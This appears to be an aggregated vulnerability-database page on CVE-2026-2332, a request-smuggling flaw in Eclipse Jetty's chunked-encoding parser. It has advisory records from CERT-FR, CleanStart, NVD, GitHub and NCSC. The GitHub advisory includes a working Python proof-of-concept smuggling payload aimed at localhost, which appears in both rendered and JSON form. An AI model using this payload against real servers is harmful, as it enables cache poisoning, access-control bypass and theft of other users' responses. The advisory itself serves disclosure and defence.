"name": "CVE-2026-3304",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-3304"
},
{
"name": "CVE-2026-40895",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-40895"
},
{
"name": "CVE-2026-42198",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42198"
},
{
"name": "CVE-2026-22016",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22016"
},
{
"name": "CVE-2026-22021",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22021"
},
{
"name": "CVE-2026-22007",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22007"
},
{
"name": "CVE-2026-34268",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-34268"
},
{
"name": "CVE-2026-41481",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-41481"
},
{
"name": "CVE-2026-42038",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42038"
},
{
"name": "CVE-2026-2332",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-2332"
},
{
"name": "CVE-2026-1528",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-1528"
},
{
"name": "CVE-2026-42039",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42039"
},
{
"name": "CVE-2025-15599",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-15599"
},
{
"name": "CVE-2026-1526",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-1526"
},
{
"name": "CVE-2025-47913",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47913"
},
{
"name": "CVE-2026-33672",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33672"
},
{
"name": "CVE-2026-33151",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33151"
},
{
"name": "CVE-2025-58181",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58181"
},
{
"name": "CVE-2025-47914",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47914"
},
{
"name": "CVE-2026-42044",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42044"
},
{
"name": "CVE-2026-39373",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-39373"
},
{
"name": "CVE-2026-41425",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-41425"
},
{
"name": "CVE-2026-8620",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-8620"
},
{
"name": "CVE-2026-8633",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-8633"
},
{
"name": "CVE-2026-42034",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42034"
},
{
"name": "CVE-2026-9330",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-9330"
},
{
"name": "CVE-2025-27789",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27789"
},
{
"name": "CVE-2026-9311",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-9311"
},
{
"name": "CVE-2026-44431",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-44431"
},
{
"name": "CVE-2026-41238",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-41238"
},
{
"name": "CVE-2022-24771",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-24771"
},
{
"name": "CVE-2026-30951",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-30951"
},
{
"name": "CVE-2026-42037",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42037"
},
{
"name": "CVE-2026-42042",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42042"
},
{
"name": "CVE-2026-41168",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-41168"
},
{
"name": "CVE-2026-34477",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-34477"
},
{
"name": "CVE-2026-41205",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-41205"
},
{
"name": "CVE-2026-29063",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-29063"
},
{
"name": "CVE-2025-13465",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-13465"
},
{
"name": "CVE-2026-4926",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-4926"
},
{
"name": "CVE-2026-33896",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33896"
},
{
"name": "CVE-2026-24486",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-24486"
}
],
"initial_release_date": "2026-06-05T00:00:00",
"last_revision_date": "2026-06-05T00:00:00",
"links": [],
"reference": "CERTFR-2026-AVI-0698",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2026-06-05T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Injection de requ\u00eates ill\u00e9gitimes par rebond (CSRF)"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Injection SQL (SQLi)"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "Falsification de requ\u00eates c\u00f4t\u00e9 serveur (SSRF)"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "\u00c9l\u00e9vation de privil\u00e8ges"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits IBM. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, une \u00e9l\u00e9vation de privil\u00e8ges et un d\u00e9ni de service \u00e0 distance.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
"vendor_advisories": [
{
"published_at": "2026-06-02",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7274859",
"url": "https://www.ibm.com/support/pages/node/7274859"
},
{
"published_at": "2026-06-02",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7274847",
"url": "https://www.ibm.com/support/pages/node/7274847"
},
{
"published_at": "2026-06-02",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7274843",
"url": "https://www.ibm.com/support/pages/node/7274843"
},
{
"published_at": "2026-06-02",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7274827",
"url": "https://www.ibm.com/support/pages/node/7274827"
},
{
"published_at": "2026-06-02",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7274845",
"url": "https://www.ibm.com/support/pages/node/7274845"
},
{
"published_at": "2026-06-01",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7274733",
"url": "https://www.ibm.com/support/pages/node/7274733"
},
{
"published_at": "2026-06-02",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7274954",
"url": "https://www.ibm.com/support/pages/node/7274954"
},
{
"published_at": "2026-06-03",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7275089",
"url": "https://www.ibm.com/support/pages/node/7275089"
},
{
"published_at": "2026-06-01",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7274746",
"url": "https://www.ibm.com/support/pages/node/7274746"
},
{
"published_at": "2026-06-02",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7274858",
"url": "https://www.ibm.com/support/pages/node/7274858"
},
{
"published_at": "2026-06-01",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7274738",
"url": "https://www.ibm.com/support/pages/node/7274738"
},
{
"published_at": "2026-06-01",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7274740",
"url": "https://www.ibm.com/support/pages/node/7274740"
},
{
"published_at": "2026-06-02",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7274860",
"url": "https://www.ibm.com/support/pages/node/7274860"
},
{
"published_at": "2026-06-01",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7274750",
"url": "https://www.ibm.com/support/pages/node/7274750"
},
{
"published_at": "2026-06-02",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7274846",
"url": "https://www.ibm.com/support/pages/node/7274846"
},
{
"published_at": "2026-06-03",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7275012",
"url": "https://www.ibm.com/support/pages/node/7275012"
},
{
"published_at": "2026-05-29",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7274512",
"url": "https://www.ibm.com/support/pages/node/7274512"
},
{
"published_at": "2026-06-02",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7273815",
"url": "https://www.ibm.com/support/pages/node/7273815"
}
]
}
cleanstart-2026-cc73064
Vulnerability from cleanstart
Multiple security vulnerabilities affect the apache-zookeeper package. In Eclipse Jetty, the HTTP/1. See references for individual vulnerability details.
| URL | Type | |||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||||||||||||||||||||
{
"affected": [
{
"package": {
"ecosystem": "CleanStart",
"name": "apache-zookeeper"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.7.2-r6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"credits": [],
"database_specific": {},
"details": "Multiple security vulnerabilities affect the apache-zookeeper package. In Eclipse Jetty, the HTTP/1. See references for individual vulnerability details.",
"id": "CLEANSTART-2026-CC73064",
"modified": "2026-06-10T11:02:26Z",
"published": "2026-06-11T00:40:13.261602Z",
"references": [
{
"type": "ADVISORY",
"url": "https://github.com/cleanstart-dev/cleanstart-security-advisories/tree/main/advisories/2026/CLEANSTART-2026-CC73064.json"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-13151"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-22695"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-22801"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-2332"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-24515"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-25210"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-25646"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-72hv-8253-57qq"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13151"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22695"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22801"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2332"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24515"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25210"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25646"
}
],
"related": [],
"schema_version": "1.7.3",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "In Eclipse Jetty, the HTTP/1",
"upstream": [
"CVE-2025-13151",
"CVE-2026-22695",
"CVE-2026-22801",
"CVE-2026-2332",
"CVE-2026-24515",
"CVE-2026-25210",
"CVE-2026-25646",
"ghsa-72hv-8253-57qq"
]
}
cleanstart-2026-rr82368
Vulnerability from cleanstart
Multiple security vulnerabilities affect the apache-zookeeper package. These issues are resolved in later releases. See references for individual vulnerability details.
| URL | Type | |||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||||||||||||||||||||
{
"affected": [
{
"package": {
"ecosystem": "CleanStart",
"name": "apache-zookeeper"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.7.2-r6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"credits": [],
"database_specific": {},
"details": "Multiple security vulnerabilities affect the apache-zookeeper package. These issues are resolved in later releases. See references for individual vulnerability details.",
"id": "CLEANSTART-2026-RR82368",
"modified": "2026-06-05T04:16:47Z",
"published": "2026-06-08T13:21:05.174938Z",
"references": [
{
"type": "ADVISORY",
"url": "https://github.com/cleanstart-dev/cleanstart-security-advisories/tree/main/advisories/2026/CLEANSTART-2026-RR82368.json"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-13151"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-22695"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-22801"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-2332"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-24515"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-25210"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-25646"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-72hv-8253-57qq"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13151"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22695"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22801"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2332"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24515"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25210"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25646"
}
],
"related": [],
"schema_version": "1.7.3",
"summary": "Security fixes for CVE-2025-13151, CVE-2026-22695, CVE-2026-22801, CVE-2026-2332, CVE-2026-24515, CVE-2026-25210, CVE-2026-25646, ghsa-72hv-8253-57qq applied in versions: 3.7.2-r4, 3.7.2-r5, 3.7.2-r6",
"upstream": [
"CVE-2025-13151",
"CVE-2026-22695",
"CVE-2026-22801",
"CVE-2026-2332",
"CVE-2026-24515",
"CVE-2026-25210",
"CVE-2026-25646",
"ghsa-72hv-8253-57qq"
]
}
FKIE_CVE-2026-2332
Vulnerability from fkie_nvd - Published: 2026-04-14 12:16 - Updated: 2026-05-01 13:319.1 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
| URL | Tags | ||
|---|---|---|---|
| emo@eclipse.org | https://github.com/jetty/jetty.project/security/advisories/GHSA-355h-qmc2-wpwf | Exploit, Vendor Advisory, Mitigation | |
| emo@eclipse.org | https://gitlab.eclipse.org/security/cve-assignment/-/issues/89 | Issue Tracking, Vendor Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E0FB149B-EF33-4A51-9B96-030899E250CC",
"versionEndExcluding": "9.4.60",
"versionStartIncluding": "9.4.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:*",
"matchCriteriaId": "361D419A-7A89-439A-99B1-D34E9914BAE8",
"versionEndExcluding": "10.0.28",
"versionStartIncluding": "10.0.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7020D8E5-61DD-4DB6-82E4-EA46A96838A9",
"versionEndExcluding": "11.0.28",
"versionStartIncluding": "11.0.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E1A6095F-3D1E-40CB-A875-D41BF6C73EB3",
"versionEndExcluding": "12.0.33",
"versionStartIncluding": "12.0.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B5A32954-7B03-46B6-9956-54BE0F8477E8",
"versionEndExcluding": "12.1.7",
"versionStartIncluding": "12.1.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "In Eclipse Jetty, the HTTP/1.1 parser is vulnerable to request smuggling when chunk extensions are used, similar to the \"funky chunks\" techniques outlined here:\n * https://w4ke.info/2025/06/18/funky-chunks.html\n\n * https://w4ke.info/2025/10/29/funky-chunks-2.html\n\n\nJetty terminates chunk extension parsing at\u00a0\\r\\n\u00a0inside quoted strings instead of treating this as an error.\n\n\nPOST / HTTP/1.1\nHost: localhost\nTransfer-Encoding: chunked\n\n1;ext=\"val\nX\n0\n\nGET /smuggled HTTP/1.1\n...\n\n\n\n\n\nNote how the chunk extension does not close the double quotes, and it is able to inject a smuggled request."
}
],
"id": "CVE-2026-2332",
"lastModified": "2026-05-01T13:31:00.310",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.2,
"impactScore": 5.2,
"source": "emo@eclipse.org",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.2,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2026-04-14T12:16:21.333",
"references": [
{
"source": "emo@eclipse.org",
"tags": [
"Exploit",
"Vendor Advisory",
"Mitigation"
],
"url": "https://github.com/jetty/jetty.project/security/advisories/GHSA-355h-qmc2-wpwf"
},
{
"source": "emo@eclipse.org",
"tags": [
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://gitlab.eclipse.org/security/cve-assignment/-/issues/89"
}
],
"sourceIdentifier": "emo@eclipse.org",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-444"
}
],
"source": "emo@eclipse.org",
"type": "Primary"
}
]
}
GHSA-355H-QMC2-WPWF
Vulnerability from github – Published: 2026-04-14 23:40 – Updated: 2026-05-20 00:30Description (as reported)
Jetty incorrectly parses quoted strings in HTTP/1.1 chunked transfer encoding extension values, enabling request smuggling attacks.
Background
This vulnerability is a new variant discovered while researching the "Funky Chunks" HTTP request smuggling techniques: - https://w4ke.info/2025/06/18/funky-chunks.html - https://w4ke.info/2025/10/29/funky-chunks-2.html
The original research tested various chunk extension parsing differentials but did not test quoted-string handling within extension values.
Technical Details
RFC 9112 Section 7.1.1 defines chunked transfer encoding:
chunk = chunk-size [ chunk-ext ] CRLF chunk-data CRLF
chunk-ext = *( BWS ";" BWS chunk-ext-name [ BWS "=" BWS chunk-ext-val ] )
chunk-ext-val = token / quoted-string
RFC 9110 Section 5.6.4 defines quoted-string:
quoted-string = DQUOTE *( qdtext / quoted-pair ) DQUOTE
A quoted-string continues until the closing DQUOTE, and \r\n sequences are not permitted within the quotes.
Vulnerability
Jetty terminates chunk header parsing at \r\n inside quoted strings instead of treating this as an error.
Expected (RFC compliant):
Chunk: 1;a="value\r\nhere"\r\n
^^^^^^^^^^^^^^^^^^ extension value
Body: [1 byte after the real \r\n]
Actual (jetty):
Chunk: 1;a="value
^^^^^ terminates here (WRONG)
Body: here"... treated as body/next request
Proof of Concept
#!/usr/bin/env python3
import socket
payload = (
b"POST / HTTP/1.1\r\n"
b"Host: localhost\r\n"
b"Transfer-Encoding: chunked\r\n"
b"\r\n"
b'1;a="\r\n'
b"X\r\n"
b"0\r\n"
b"\r\n"
b"GET /smuggled HTTP/1.1\r\n"
b"Host: localhost\r\n"
b"Content-Length: 11\r\n"
b"\r\n"
b'"\r\n'
b"Y\r\n"
b"0\r\n"
b"\r\n"
)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(3)
sock.connect(("127.0.0.1", 8080))
sock.sendall(payload)
response = b""
while True:
try:
chunk = sock.recv(4096)
if not chunk:
break
response += chunk
except socket.timeout:
break
sock.close()
print(f"Responses: {response.count(b'HTTP/')}")
print(response.decode(errors="replace"))
Result: Server returns 2 HTTP responses from a single TCP connection.
Parsing Breakdown
| Parser | Request 1 | Request 2 |
|---|---|---|
| jetty (vulnerable) | POST / body="X" | GET /smuggled (SMUGGLED!) |
| RFC compliant | POST / body="Y" | (none - smuggled request hidden in extension) |
Impact
- Request Smuggling: Attacker injects arbitrary HTTP requests
- Cache Poisoning: Smuggled responses poison shared caches
- Access Control Bypass: Smuggled requests bypass frontend security
- Session Hijacking: Smuggled requests can steal other users' responses
Reproduction
- Start the minimal POC with docker
- Run the poc script provided in same zip
Suggested Fix
Ensure the chunk framing and extensions are parsed exactly as specified in RFC9112. A CRLF inside a quoted-string should be considered a parsing error and not a line terminator.
Patches
No patches yet.
Workarounds
No workarounds yet.
References
- RFC 9110: HTTP Semantics (Sections 5.6.4, 7.1.1)
- Funky Chunks Research: https://w4ke.info/2025/06/18/funky-chunks.html
- details for security versions https://jetty.org/security.html
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 12.1.6"
},
"package": {
"ecosystem": "Maven",
"name": "org.eclipse.jetty:jetty-http"
},
"ranges": [
{
"events": [
{
"introduced": "12.1.0"
},
{
"fixed": "12.1.7"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 12.0.32"
},
"package": {
"ecosystem": "Maven",
"name": "org.eclipse.jetty:jetty-http"
},
"ranges": [
{
"events": [
{
"introduced": "12.0.0"
},
{
"fixed": "12.0.33"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.eclipse.jetty:jetty-http"
},
"ranges": [
{
"events": [
{
"introduced": "11.0.0"
},
{
"last_affected": "11.0.27"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.eclipse.jetty:jetty-http"
},
"ranges": [
{
"events": [
{
"introduced": "10.0.0"
},
{
"last_affected": "10.0.27"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.eclipse.jetty:jetty-http"
},
"ranges": [
{
"events": [
{
"introduced": "9.4.0"
},
{
"last_affected": "9.4.59"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-2332"
],
"database_specific": {
"cwe_ids": [
"CWE-444"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-14T23:40:31Z",
"nvd_published_at": "2026-04-14T12:16:21Z",
"severity": "HIGH"
},
"details": "### Description (as reported)\n\nJetty incorrectly parses quoted strings in HTTP/1.1 chunked transfer encoding extension values, enabling request smuggling attacks.\n\n### Background\n\nThis vulnerability is a new variant discovered while researching the \"Funky Chunks\" HTTP request smuggling techniques:\n- https://w4ke.info/2025/06/18/funky-chunks.html\n- https://w4ke.info/2025/10/29/funky-chunks-2.html\n\nThe original research tested various chunk extension parsing differentials but did not test quoted-string handling within extension values.\n\n### Technical Details\n\n**RFC 9112 Section 7.1.1** defines chunked transfer encoding:\n```\nchunk = chunk-size [ chunk-ext ] CRLF chunk-data CRLF\nchunk-ext = *( BWS \";\" BWS chunk-ext-name [ BWS \"=\" BWS chunk-ext-val ] )\nchunk-ext-val = token / quoted-string\n```\n\n**RFC 9110 Section 5.6.4** defines quoted-string:\n```\nquoted-string = DQUOTE *( qdtext / quoted-pair ) DQUOTE\n```\n\nA quoted-string continues until the closing DQUOTE, and `\\r\\n` sequences are not permitted within the quotes.\n\n### Vulnerability\n\nJetty terminates chunk header parsing at `\\r\\n` inside quoted strings instead of treating this as an error.\n\n**Expected (RFC compliant):**\n```\nChunk: 1;a=\"value\\r\\nhere\"\\r\\n\n ^^^^^^^^^^^^^^^^^^ extension value\nBody: [1 byte after the real \\r\\n]\n```\n\n**Actual (jetty):**\n```\nChunk: 1;a=\"value\n ^^^^^ terminates here (WRONG)\nBody: here\"... treated as body/next request\n```\n\n### Proof of Concept\n\n```python\n#!/usr/bin/env python3\nimport socket\n\npayload = (\n b\"POST / HTTP/1.1\\r\\n\"\n b\"Host: localhost\\r\\n\"\n b\"Transfer-Encoding: chunked\\r\\n\"\n b\"\\r\\n\"\n b\u00271;a=\"\\r\\n\u0027\n b\"X\\r\\n\"\n b\"0\\r\\n\"\n b\"\\r\\n\"\n b\"GET /smuggled HTTP/1.1\\r\\n\"\n b\"Host: localhost\\r\\n\"\n b\"Content-Length: 11\\r\\n\"\n b\"\\r\\n\"\n b\u0027\"\\r\\n\u0027\n b\"Y\\r\\n\"\n b\"0\\r\\n\"\n b\"\\r\\n\"\n)\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsock.settimeout(3)\nsock.connect((\"127.0.0.1\", 8080))\nsock.sendall(payload)\n\nresponse = b\"\"\nwhile True:\n try:\n chunk = sock.recv(4096)\n if not chunk:\n break\n response += chunk\n except socket.timeout:\n break\n\nsock.close()\nprint(f\"Responses: {response.count(b\u0027HTTP/\u0027)}\")\nprint(response.decode(errors=\"replace\"))\n```\n\n**Result:** Server returns 2 HTTP responses from a single TCP connection.\n\n#### Parsing Breakdown\n\n| Parser | Request 1 | Request 2 |\n|--------|-----------|-----------|\n| jetty (vulnerable) | POST / body=\"X\" | GET /smuggled (SMUGGLED!) |\n| RFC compliant | POST / body=\"Y\" | (none - smuggled request hidden in extension) |\n\n### Impact\n\n- **Request Smuggling**: Attacker injects arbitrary HTTP requests\n- **Cache Poisoning**: Smuggled responses poison shared caches\n- **Access Control Bypass**: Smuggled requests bypass frontend security\n- **Session Hijacking**: Smuggled requests can steal other users\u0027 responses\n\n### Reproduction\n\n1. Start the minimal POC with docker\n2. Run the poc script provided in same zip\n\n### Suggested Fix\n\nEnsure the chunk framing and extensions are parsed exactly as specified in RFC9112. \nA CRLF inside a quoted-string should be considered a parsing error and not a line terminator.\n\n\n### Patches\nNo patches yet.\n\n### Workarounds\nNo workarounds yet.\n\n### References\n\n- RFC 9110: HTTP Semantics (Sections 5.6.4, 7.1.1)\n- Funky Chunks Research: https://w4ke.info/2025/06/18/funky-chunks.html\n- details for security versions https://jetty.org/security.html",
"id": "GHSA-355h-qmc2-wpwf",
"modified": "2026-05-20T00:30:03Z",
"published": "2026-04-14T23:40:31Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/jetty/jetty.project/security/advisories/GHSA-355h-qmc2-wpwf"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2332"
},
{
"type": "PACKAGE",
"url": "https://github.com/jetty/jetty.project"
},
{
"type": "WEB",
"url": "https://gitlab.eclipse.org/security/cve-assignment/-/issues/89"
},
{
"type": "WEB",
"url": "https://w4ke.info/2025/06/18/funky-chunks.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Jetty has HTTP Request Smuggling via Chunked Extension Quoted-String Parsing"
}
NCSC-2026-0169
Vulnerability from csaf_ncscnl - Published: 2026-05-29 12:20 - Updated: 2026-05-29 12:20Eclipse Jetty's HTTP/1.1 parser improperly handles unclosed quoted strings in chunked transfer encoding extensions, enabling request smuggling attacks that can lead to security bypass, cache poisoning, and unauthorized HTTP request injection.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Oracle / Database Server
|
vers:unknown/* | ||
|
vers:unknown/*
Oracle / REST Data Services
|
vers:unknown/* |
A vulnerability in Oracle REST Data Services versions 24.2.0 to 26.1.0 allows a low-privileged attacker with HTTPS network access to cause unauthorized data modification, access, or partial denial of service, with a CVSS 3.1 score of 7.9.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Oracle / Database Server
|
vers:unknown/* | ||
|
vers:unknown/*
Oracle / REST Data Services
|
vers:unknown/* |
A vulnerability in Oracle REST Data Services (versions 24.2.0-26.1.0) allows low-privileged attackers with HTTPS network access to create, delete, or modify critical data, with a CVSS 3.1 base score of 8.1 indicating high confidentiality and integrity impact.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Oracle / Database Server
|
vers:unknown/* | ||
|
vers:unknown/*
Oracle / REST Data Services
|
vers:unknown/* |
A critical vulnerability in Oracle REST Data Services versions 24.2.0 to 26.1.0 allows a low-privileged attacker with network access via HTTPS to fully compromise the service, with a CVSS 3.1 base score of 9.9.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Oracle / Database Server
|
vers:unknown/* | ||
|
vers:unknown/*
Oracle / REST Data Services
|
vers:unknown/* |
A denial of service vulnerability in Oracle REST Data Services (Mongoapi component) versions 24.2.0 to 26.1.0 allows unauthenticated attackers with HTTPS network access to hang or crash the service, rated CVSS 7.5.
